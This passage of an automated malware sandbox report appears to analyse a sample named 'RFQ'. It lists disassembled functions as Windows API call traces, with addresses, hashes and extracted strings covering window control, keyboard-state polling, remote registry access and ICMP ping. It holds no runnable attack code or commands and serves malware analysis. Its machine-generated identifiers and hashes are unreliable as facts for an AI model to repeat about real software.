                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 1149970189-3457252023
                                                                            • Opcode ID: c5366312cda2e7fdeb88176f51ba73e42b82a6dab3327f5c129dcdac96fa2d7c
                                                                            • Instruction ID: c5e96da5415d191ae407c3c9adf900b76e19eed8e4272005218f703f68b9a0a9
                                                                            • Opcode Fuzzy Hash: c5366312cda2e7fdeb88176f51ba73e42b82a6dab3327f5c129dcdac96fa2d7c
                                                                            • Instruction Fuzzy Hash: DD31D675540119ABDB219BA4DC49FEB33BEFF89700F1080B5F605E6290EB7497448B28
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 006EE5D2
                                                                              • Part of subcall function 0069E465: timeGetTime.WINMM(?,?,006EE5F2), ref: 0069E469
                                                                            • Sleep.KERNEL32(0000000A), ref: 006EE5FF
                                                                            • EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 006EE623
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006EE645
                                                                            • SetActiveWindow.USER32 ref: 006EE664
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006EE672
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 006EE691
                                                                            • Sleep.KERNEL32(000000FA), ref: 006EE69C
                                                                            • IsWindow.USER32 ref: 006EE6A8
                                                                            • EndDialog.USER32(00000000), ref: 006EE6B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 7d2b31ea81866b955d954da85d625860ce26bcbeda86604632ef423395f70ddb
                                                                            • Instruction ID: 78261e064b786b216a3848aa8dbab7d090ab57b0e90497ac9639ef54f9154b1f
                                                                            • Opcode Fuzzy Hash: 7d2b31ea81866b955d954da85d625860ce26bcbeda86604632ef423395f70ddb
                                                                            • Instruction Fuzzy Hash: 2B21C6B0341344AFEB125FA5EC89BA53B6BF756746F04C415F801826F2DBBAAC05CA5C
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006EE97B
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006EE991
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EE9A2
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006EE9B4
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006EE9C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_wcslen
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2420728520-1007645807
                                                                            • Opcode ID: f0500c2ecc1d19fabf93b797333ab78e8f638a50745552779f8669670b365150
                                                                            • Instruction ID: 234ade1c0bd4cef8509eaa7f181374d8da2831c872ca1286c2f3fc84fd54f4d8
                                                                            • Opcode Fuzzy Hash: f0500c2ecc1d19fabf93b797333ab78e8f638a50745552779f8669670b365150
                                                                            • Instruction Fuzzy Hash: 2211A371A9125979D760B7A68C4AEFF6F7DEBD2B40F00042D7401A20D1EFB05945C6B1
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 006E5C38
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5C51
                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 006E5CAF
                                                                            • GetDlgItem.USER32(?,00000002), ref: 006E5CBF
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5CD1
                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 006E5D25
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 006E5D33
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006E5D45
                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 006E5D87
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 006E5D9A
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006E5DB0
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 006E5DBD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 0beb0cb5ef0b81c6bde8133bd53985ecbabc6abbad337dc71cecdd24525a338b
                                                                            • Instruction ID: 1a822781213e0fa0f21788b22189ece842dccf35ee874f1f303bf1a0803df9ae
                                                                            • Opcode Fuzzy Hash: 0beb0cb5ef0b81c6bde8133bd53985ecbabc6abbad337dc71cecdd24525a338b
                                                                            • Instruction Fuzzy Hash: 44511E70A41705AFDB09CFA9CD99AEEBBB6FF48704F108129F916E6290D7749D008B54
                                                                            APIs
                                                                              • Part of subcall function 0069A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0069A15D,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A53A
                                                                            • DestroyWindow.USER32(?), ref: 0069A1F6
                                                                            • KillTimer.USER32(00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A290
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 006D73C6
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 006D73F4
                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 006D740B
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0069A12F,00000000), ref: 006D7427
                                                                            • DeleteObject.GDI32(00000000), ref: 006D7439
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: bb12d0c373ebbe34f4f80cdae9a39bf2b8e9fe1464f9f7e69f783f086e10a306
                                                                            • Instruction ID: 41fb65b1c0416b280b5a1039fcba9e1dde2c983145479a18437b567d969f0f50
                                                                            • Opcode Fuzzy Hash: bb12d0c373ebbe34f4f80cdae9a39bf2b8e9fe1464f9f7e69f783f086e10a306
                                                                            • Instruction Fuzzy Hash: D0617C31505700DFCF269F98D948BA97BF6FB40312F158519E44287AA0C3B9BD90DBCA
                                                                            APIs
                                                                              • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
                                                                            • GetSysColor.USER32(0000000F), ref: 0069ACE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 52f30f44c424bc71eddcb2ccf5d92e9c9c2db24d41fd47a7a68b6366bd421c5f
                                                                            • Instruction ID: 190557912a6fd1d447d85721a1d10dba50e2dcb8032045aaa23b7285ee6eaa79
                                                                            • Opcode Fuzzy Hash: 52f30f44c424bc71eddcb2ccf5d92e9c9c2db24d41fd47a7a68b6366bd421c5f
                                                                            • Instruction Fuzzy Hash: E841BE71144644AFDF215BACDC48BF937EBAF02322F148605F9A28BAE1D7349C46DB52
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006D03D3,?,0000138C,?,?,?,?,00000000,?), ref: 006E9635
                                                                            • LoadStringW.USER32(00000000,?,006D03D3,?), ref: 006E963E
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,006D03D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 006E9660
                                                                            • LoadStringW.USER32(00000000,?,006D03D3,?), ref: 006E9663
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006E9784
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 747408836-2268648507
                                                                            • Opcode ID: 16ab527eb00951cf5eeabec002cf03acc63ab7f663fead1d8fae026ac2465778
                                                                            • Instruction ID: f31910811d2ba3cd65f59882edd5e3ba9ec7ca239b5874b8da14cd1ce0313169
                                                                            • Opcode Fuzzy Hash: 16ab527eb00951cf5eeabec002cf03acc63ab7f663fead1d8fae026ac2465778
                                                                            • Instruction Fuzzy Hash: 90416E72801209AACF44FFE5CD96DEE777AAF15300F100129F50276092EB786F49CB69
                                                                            APIs
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006E068B
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006E06A7
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006E06C3
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006E06ED
                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 006E0715
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E0720
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E0725
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 323675364-22481851
                                                                            • Opcode ID: 44f6edbc548e615ce66bbdaffe032166f3354b6d6293e63a6a96e013f960f7f0
                                                                            • Instruction ID: bd63f201dba3c4d66f95a81b33e6a21186668a7d5fd9287be2306b12a8d3d95e
                                                                            • Opcode Fuzzy Hash: 44f6edbc548e615ce66bbdaffe032166f3354b6d6293e63a6a96e013f960f7f0
                                                                            • Instruction Fuzzy Hash: 57410672811229ABDF11EBE4DC959EEB7B9BF14350F008129E805A72A1EB749E44CF64
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00703B83
                                                                            • CoInitialize.OLE32(00000000), ref: 00703BB1
                                                                            • CoUninitialize.OLE32 ref: 00703BBB
                                                                            • _wcslen.LIBCMT ref: 00703C54
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00703CD8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00703DFC
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00703E35
                                                                            • CoGetObject.OLE32(?,00000000,0071FBB4,?), ref: 00703E54
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00703E67
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00703EEB
                                                                            • VariantClear.OLEAUT32(?), ref: 00703EFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                            • String ID:
                                                                            • API String ID: 429561992-0
                                                                            • Opcode ID: 3a3bb3d345e830ae8e4d1ffaf25a23809389cf06ba81b60dbb49ac2b1830fb2b
                                                                            • Instruction ID: f4f375e8c478ca461de4b7dd547089b6c5e166dbe2823545328170c785ed2ba4
                                                                            • Opcode Fuzzy Hash: 3a3bb3d345e830ae8e4d1ffaf25a23809389cf06ba81b60dbb49ac2b1830fb2b
                                                                            • Instruction Fuzzy Hash: E7C125B1604205EFD700DF68C88496BBBE9FF89748F104A1DF5899B290DB75EE05CB52
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006F7A11
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006F7AAD
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 006F7AC1
                                                                            • CoCreateInstance.OLE32(0071FD24,00000000,00000001,00746E7C,?), ref: 006F7B0D
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006F7B92
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 006F7BEA
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 006F7C75
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006F7C98
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006F7C9F
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006F7CF4
                                                                            • CoUninitialize.OLE32 ref: 006F7CFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2762341140-0
                                                                            • Opcode ID: ab805aec1c77ccdc7e643c5021e3381a66003280b9bfc08372025f4dff03f7f9
                                                                            • Instruction ID: a63c40489c0174612ea1ff789bbf917840e1b9808e5f58a74f717e72b1893cb8
                                                                            • Opcode Fuzzy Hash: ab805aec1c77ccdc7e643c5021e3381a66003280b9bfc08372025f4dff03f7f9
                                                                            • Instruction Fuzzy Hash: 65C12C75A04109AFCB14DFA4C898DAEBBF6FF48304B148598E916DB361DB30EE45CB94
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00715439
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0071544A
                                                                            • CharNextW.USER32(00000158), ref: 00715479
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007154BA
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007154D0
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007154E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: a1198e5a56e2583db7dc9ace216c197a694589195dfbeb6e58eceb9b213bda3f
                                                                            • Instruction ID: 15782578f9a8c617ffb5fea45d4e66068b51510e6f04c448b39b539ca1c8502f
                                                                            • Opcode Fuzzy Hash: a1198e5a56e2583db7dc9ace216c197a694589195dfbeb6e58eceb9b213bda3f
                                                                            • Instruction Fuzzy Hash: 32619E70900608EFDB198F98CC84EFE7BB9EB85755F108149F925A72D0C7789AC1CB60
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006DF998
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 006DF9F1
                                                                            • VariantInit.OLEAUT32(?), ref: 006DFA03
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006DFA23
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 006DFA76
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 006DFA8A
                                                                            • VariantClear.OLEAUT32(?), ref: 006DFA9F
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 006DFAAC
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006DFAB5
                                                                            • VariantClear.OLEAUT32(?), ref: 006DFAC7
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006DFAD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: ae44238ecfcce37e12e170ed37d05bb95a6c21d7b727775d6b1fdfffd1437755
                                                                            • Instruction ID: 3fcf287f531a9c24cab61ab5bdefe1b50f0e05e4224d91769a4fb006b3856b36
                                                                            • Opcode Fuzzy Hash: ae44238ecfcce37e12e170ed37d05bb95a6c21d7b727775d6b1fdfffd1437755
                                                                            • Instruction Fuzzy Hash: 0A415F75E00219EFCB01DFA8D8549ED7BB9EF48344F04C029E946AB361D734A945CBA4
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 006E9BBF
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 006E9C40
                                                                            • GetKeyState.USER32(000000A0), ref: 006E9C5B
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 006E9C75
                                                                            • GetKeyState.USER32(000000A1), ref: 006E9C8A
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 006E9CA2
                                                                            • GetKeyState.USER32(00000011), ref: 006E9CB4
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 006E9CCC
                                                                            • GetKeyState.USER32(00000012), ref: 006E9CDE
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 006E9CF6
                                                                            • GetKeyState.USER32(0000005B), ref: 006E9D08
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: e32f3ed1f275f297a25a4543991d746bd856b106fc51b431b7f66a861bdad172
                                                                            • Instruction ID: 00bac1c2fb24b9672fa82a1af6002b4c7b765b0d81dcf0462d35567013c8e86d
                                                                            • Opcode Fuzzy Hash: e32f3ed1f275f297a25a4543991d746bd856b106fc51b431b7f66a861bdad172
                                                                            • Instruction Fuzzy Hash: AB410770505BCA6DFF31A76688043F6BEE26F12744F24805AC6C6577C2EBA499C8C772
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(0071D0D0,?,?), ref: 006E4212
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharForegroundUpperWindow
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1486467469-1994484594
                                                                            • Opcode ID: 9f857e8738e6a869fa87b33300861eb1f4ee357e80b52f47711b8fcf350c932d
                                                                            • Instruction ID: 63dbff9946ac2e03df9268e9ad88642bcf424f9f1dec0c1f2aa5c034b3706b12
                                                                            • Opcode Fuzzy Hash: 9f857e8738e6a869fa87b33300861eb1f4ee357e80b52f47711b8fcf350c932d
                                                                            • Instruction Fuzzy Hash: 8981E132A053929BCB14EF7AC8945AAB3E3BF95310B50462DF456D7680EF30EE458B91
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 007004E3
                                                                            • inet_addr.WSOCK32(?), ref: 00700543
                                                                            • gethostbyname.WSOCK32(?), ref: 0070054F
                                                                            • IcmpCreateFile.IPHLPAPI ref: 0070055D
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007005ED
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0070060C
                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 007006E0
                                                                            • WSACleanup.WSOCK32 ref: 007006E6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: 5c71c6ebcd3547e7c7df2e652d3e5320c88f38bcde7957f10553b9eb303a1465
                                                                            • Instruction ID: 64d68774b30cf450f77b5d93e38f1cdb5a78f9e812efd295e1da91922fe3161a
                                                                            • Opcode Fuzzy Hash: 5c71c6ebcd3547e7c7df2e652d3e5320c88f38bcde7957f10553b9eb303a1465
                                                                            • Instruction Fuzzy Hash: 3291AD70604201EFD720DF19C888F16BBE1AF85328F1586A9E4698B6E2C739ED55CFD1
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 707087890-567219261
                                                                            • Opcode ID: 3d19c941261f3d5c5d3c9d82421cc584eab45a8085d9665f1b876ae738af6b49
                                                                            • Instruction ID: ed9104d9c81a6ea75f8a15e4b7b833dae2624d58050d8d3f215b4478dcdd53c6
